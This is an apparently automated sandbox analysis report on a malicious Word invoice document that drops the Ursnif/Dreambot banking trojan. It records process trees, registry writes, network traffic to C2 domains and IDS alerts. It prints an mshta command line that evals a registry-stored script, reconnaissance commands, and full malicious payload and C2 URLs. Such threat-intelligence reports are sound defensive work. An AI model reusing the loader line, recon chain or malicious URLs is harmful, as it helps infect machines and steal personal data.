URL: http://eweodinda.ru/Factura_00012.doc

Full analysis: https://app.any.run/tasks/68101558-4091-470e-ae10-701295ae293d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 21, 2020, 15:43:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
dreambot
Indicators:
MD5: ACDA726731D95ED421FBCF9FD6556E4D
SHA1: E1D3E981F25AADA8833864EAC65D6F20C46D5A9D
SHA256: 68CF6DCD865488918285066E713B67D477A682EDCAF5657CDF236129229DEDA3
SSDEEP: 3:N1KbzujyUbXAGn:CnujypGn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2856)
    • URSNIF was detected

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)
    • DREAMBOT was detected

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)
    • Connects to CnC server

      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • explorer.exe (PID: 372)
    • Executes PowerShell scripts

      • mshta.exe (PID: 1500)
    • Starts Visual C# compiler

      • powershell.exe (PID: 2660)
    • Runs injected code in another process

      • powershell.exe (PID: 2660)
    • Application was injected by another process

      • explorer.exe (PID: 372)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 372)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3796)
    • Actions looks like stealing of personal data

      • explorer.exe (PID: 372)
  • SUSPICIOUS

    • Starts Internet Explorer

      • explorer.exe (PID: 372)
    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 3888)
    • Executed via COM

      • WINWORD.EXE (PID: 3888)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 3348)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3888)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3888)
    • Application launched itself

      • WINWORD.EXE (PID: 3888)
    • PowerShell script executed

      • powershell.exe (PID: 2856)
    • Creates files in the user directory

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2660)
      • explorer.exe (PID: 372)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2856)
    • Uses RUNDLL32.EXE to load library

      • powershell.exe (PID: 2856)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 372)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 372)
    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 372)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3576)
    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 1744)
    • Loads DLL from Mozilla Firefox

      • explorer.exe (PID: 372)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3972)
    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 2380)
    • Searches for installed software

      • reg.exe (PID: 1168)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 3348)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 4092)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 2388)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3348)
      • iexplore.exe (PID: 3968)
    • Changes internet zones settings

      • iexplore.exe (PID: 1756)
      • iexplore.exe (PID: 3348)
      • iexplore.exe (PID: 2744)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3888)
      • WINWORD.EXE (PID: 3996)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3888)
    • Reads internet explorer settings

      • iexplore.exe (PID: 4092)
      • iexplore.exe (PID: 2388)
      • iexplore.exe (PID: 3336)
      • iexplore.exe (PID: 3968)
      • mshta.exe (PID: 1500)
    • Manual execution by user

      • powershell.exe (PID: 2856)
      • mshta.exe (PID: 1500)
      • cmd.exe (PID: 3796)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 1756)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 1756)
    • Changes settings of System certificates

      • iexplore.exe (PID: 1756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 95
Monitored processes: 39
Malicious processes: 8
Suspicious processes: 1

Behavior graph

Processes in graph order (processes the graph tags with #URSNIF are marked; the "inject" edge leads from the PowerShell stage into explorer.exe):
iexplore.exe, iexplore.exe, winword.exe, winword.exe, powershell.exe, rundll32.exe, iexplore.exe, iexplore.exe, iexplore.exe, iexplore.exe (#URSNIF), iexplore.exe (#URSNIF), mshta.exe, powershell.exe, csc.exe, cvtres.exe, csc.exe, cvtres.exe, explorer.exe (#URSNIF), cmd.exe, ping.exe, cmd.exe, systeminfo.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, cmd.exe, nslookup.exe, cmd.exe, cmd.exe, tasklist.exe, cmd.exe, cmd.exe, driverquery.exe, cmd.exe, cmd.exe, reg.exe, cmd.exe, cmd.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process

PID: 372
CMD: C:\Windows\Explorer.EXE
Path: C:\Windows\explorer.exe
Parent process: (not shown)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\winanr.dll
  c:\windows\system32\wshtcpip.dll
  c:\windows\explorer.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll

PID: 916
CMD: cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\1408.bin1"
Path: C:\Windows\system32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
  c:\windows\system32\cmd.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\winbrand.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll

PID: 1168
CMD: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Path: C:\Windows\system32\reg.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Registry Console Tool
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\reg.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll

PID: 1444
CMD: nslookup 127.0.0.1
Path: C:\Windows\system32\nslookup.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: nslookup
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  c:\windows\system32\nslookup.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\wsock32.dll
  c:\windows\system32\ws2_32.dll

PID: 1500
CMD: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Dmocusic'));if(!window.flag)close()</script>"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
Modules (images):
  c:\windows\system32\mshta.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\iertutil.dll
  c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll

PID: 1632
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qqmc65er.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
Modules (images):
  c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\mscoree.dll
  c:\windows\system32\ole32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\user32.dll

PID: 1688
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tc3y4lix.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
Modules (images):
  c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\mscoree.dll
  c:\windows\system32\ole32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\user32.dll

PID: 1744
CMD: cmd /C "tasklist.exe /SVC >> C:\Users\admin\AppData\Local\Temp\1408.bin1"
Path: C:\Windows\system32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
  c:\windows\system32\cmd.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\winbrand.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll

PID: 1756
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" "http://eweodinda.ru/Factura_00012.doc"
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 1
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
Modules (images):
  c:\program files\internet explorer\iexplore.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\iertutil.dll

PID: 1856
CMD: cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\1408.bin1"
Path: C:\Windows\system32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
  c:\windows\system32\cmd.exe
  c:\systemroot\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\winbrand.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\gdi32.dll
  c:\windows\system32\lpk.dll
  c:\windows\system32\usp10.dll
Total events: 11 943
Read events: 4 066
Write events: 5 406
Delete events: 2 471

Modification events

(372) explorer.exe
  Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
  Operation: write
  Name: LanguageList
  Value: en-US

(4092) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
  Operation: write
  Name: CachePrefix
  Value: (empty)

(4092) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
  Operation: write
  Name: CachePrefix
  Value: Cookie:

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
  Operation: write
  Name: NextCheckForUpdateLowDateTime
  Value: 3127936374

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
  Operation: write
  Name: NextCheckForUpdateHighDateTime
  Value: 30795981

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
  Operation: write
  Name: CachePrefix
  Value: (empty)

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
  Operation: write
  Name: CachePrefix
  Value: Cookie:

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
  Operation: write
  Name: CachePrefix
  Value: Visited:

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  Operation: write
  Name: CompatibilityFlags
  Value: 0

(1756) iexplore.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  Operation: write
  Name: ProxyEnable
  Value: 0
Executable files: 1
Suspicious files: 48
Text files: 32
Unknown types: 5

Dropped files

PID | Process | Filename | Type
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR81EA.tmp.cvr | -
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{264B923D-EEA5-463C-A23D-9D5145CE0810} | -
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{752EF411-D25D-4506-80FE-95A8307E18C2} | -
1756 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | -
1756 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF402D921491D96034.TMP | -
1756 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF8762AADEF92C69B2.TMP | -
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{5C3D0551-A7A3-49B3-B24F-C9A32B4DF6B0}.FSD | binary
3996 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_D27E7F53-6E14-4AAD-B287-8C56658F6A9A.0\~DF243B9EE656BB57EC.TMP | -
3888 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFCBF197F90554128A.TMP | -
(The MD5 and SHA256 fields for these files are empty in this report.)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 26
TCP/UDP connections: 35
DNS requests: 13
Threats: 44

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3888 | WINWORD.EXE | HEAD | 200 | 179.8.60.63:80 | http://eweodinda.ru/Factura_00012.doc | CL | - | - | malicious
3888 | WINWORD.EXE | HEAD | 200 | 179.8.60.63:80 | http://eweodinda.ru/Factura_00012.doc | CL | - | - | malicious
3888 | WINWORD.EXE | HEAD | 200 | 179.8.60.63:80 | http://eweodinda.ru/Factura_00012.doc | CL | - | - | malicious
3968 | iexplore.exe | GET | - | 213.149.152.120:80 | http://snezhkaie.ru/images/8CQ2Z_2F20b0/Q7mu5uUuSxV/EQxzPeWNyzT1g1/qldqUrEBY_2FGCpfgENEE/EZGkm_2FPaVBjJXD/M_2BHHJCkkhObXr/j5WpKg4131WYn126u8/_2F1QFeWK/9tdI2_2FLHHYvWa6uZIb/biBdBoGSD4zXlQE3c02/3b_2BsEWFIqBKWe68bKx1o/ntFnmcCX.avi | BG | - | - | malicious
4092 | iexplore.exe | GET | 200 | 179.8.60.63:80 | http://eweodinda.ru/Factura_00012.doc | CL | document | 135 Kb | malicious
3888 | WINWORD.EXE | GET | 200 | 179.8.60.63:80 | http://eweodinda.ru/Factura_00012.doc | CL | document | 135 Kb | malicious
1756 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted
1756 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted
372 | explorer.exe | GET | 200 | 46.214.214.39:80 | http://goose-mongoose.at/images/WAmPE_2BiFndTCo2a/d8KtX5XAHLBW/hjgaJXu2Cc8/8DrjbcZ6a_2FMu/LS50nuyBsXxD2lbrcsQ1w/JrxA4YiSkeFdPXlE/8s01nYzKdHjrERd/DW2H2Cl_2FV_2F1h9K/_2FnLYDkp/5DmkjC6PHh_2Bx5JvnEA/y2ZxdfNY/N.gif | RO | binary | 853 b | malicious
3888 | WINWORD.EXE | OPTIONS | 405 | 179.8.60.63:80 | http://eweodinda.ru/ | CL | html | 157 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3888 | WINWORD.EXE | 179.8.60.63:80 | eweodinda.ru | TELEFÓNICA CHILE S.A. | CL | suspicious
1756 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
824 | svchost.exe | 179.8.60.63:80 | eweodinda.ru | TELEFÓNICA CHILE S.A. | CL | suspicious
1756 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
1756 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
2856 | powershell.exe | 179.8.60.63:80 | eweodinda.ru | TELEFÓNICA CHILE S.A. | CL | suspicious
1756 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
3968 | iexplore.exe | 213.149.152.120:80 | eweodinda.ru | UltraNET Ltd | BG | malicious
3336 | iexplore.exe | 213.149.152.120:80 | eweodinda.ru | UltraNET Ltd | BG | malicious
3348 | iexplore.exe | 213.149.152.120:80 | eweodinda.ru | UltraNET Ltd | BG | malicious

DNS requests

Domain (reputation): resolved IPs

eweodinda.ru (malicious):
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8
  • 46.214.214.39

api.bing.com (whitelisted):
  • 13.107.5.80

www.bing.com (whitelisted):
  • 204.79.197.200
  • 13.107.21.200

iecvlist.microsoft.com (whitelisted):
  • 152.199.19.161

r20swj13mr.microsoft.com (whitelisted):
  • 152.199.19.161

ocsp.digicert.com (whitelisted):
  • 93.184.220.29

fantaniz.ru (unknown): no resolved IP recorded

snezhkaie.ru (malicious):
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8
  • 46.214.214.39
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177

goose-mongoose.at (malicious):
  • 46.214.214.39
  • 179.8.60.63
  • 185.189.199.144
  • 190.213.16.177
  • 213.149.152.120
  • 88.203.214.58
  • 190.158.226.15
  • 155.133.93.30
  • 217.16.138.36
  • 109.175.7.8

Threats

PID | Process | Class | Message
4092 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
4092 | iexplore.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3888 | WINWORD.EXE | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
3888 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2856 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2856 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3336 | iexplore.exe | A Network Trojan was detected | AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
3336 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3336 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] Ursnif
3968 | iexplore.exe | A Network Trojan was detected | AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
16 ETPRO signatures available at the full report
Process | Message
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144